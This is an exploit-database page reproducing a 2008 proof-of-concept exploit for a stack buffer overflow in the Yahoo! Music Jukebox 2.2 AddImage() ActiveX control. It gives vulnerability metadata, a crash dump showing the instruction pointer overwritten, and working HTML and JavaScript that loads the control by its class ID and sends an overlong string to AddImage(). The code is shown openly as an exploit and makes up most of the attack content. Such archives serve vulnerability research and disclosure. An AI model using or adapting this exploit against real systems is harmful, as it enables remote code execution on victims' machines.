header-logo
Suggest Exploit
vendor:
Music Jukebox
by:
Krystian Kloskowski
9.3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Music Jukebox
Affected Version From: 2.2
Affected Version To: 2.2.2.056
Patch Exists: YES
Related CWE: N/A
CPE: a:yahoo:music_jukebox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Yahoo! Music Jukebox 2.2 AddImage() ActiveX 0day Remote Buffer Overlow PoC Exploit

A buffer overflow vulnerability exists in Yahoo! Music Jukebox 2.2 AddImage() ActiveX control. The vulnerability is caused due to a boundary error when handling a specially crafted argument passed to the AddImage() method. This can be exploited to cause a stack-based buffer overflow via an overly long, specially-crafted argument passed to the AddImage() method.

Mitigation:

Upgrade to the latest version of Yahoo! Music Jukebox 2.2
Source

Exploit-DB raw data:

<!--
Yahoo! Music Jukebox 2.2 AddImage() ActiveX 0day Remote Buffer Overlow PoC Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Product homepage: http://music.yahoo.com/jukebox/
Tested on:..
- Yahoo! Music Jukebox (2.2.2.056)
- MS IE 6

Details:..

----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=03EC1370: BF 37 90 7C 58 14 EC 03-9C FF FB 03 74 14 EC 03
EBP=03EC1390: 40 14 EC 03 8B 37 90 7C-58 14 EC 03 9C FF FB 03
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              --> N/A

Just for fun ;]
-->

<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>

<script>

function makebuf(payload, len) {
    while(payload.length < (len * 2)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}

var target = "AddImage";
var payload = unescape("%u4141%u4141");
var len = 340

var tmp = makebuf(payload, len);
obj[target]('http://'+tmp, 1);

</script>

# milw0rm.com [2008-02-02]

Navigation

Suggest Exploit

Services By CQR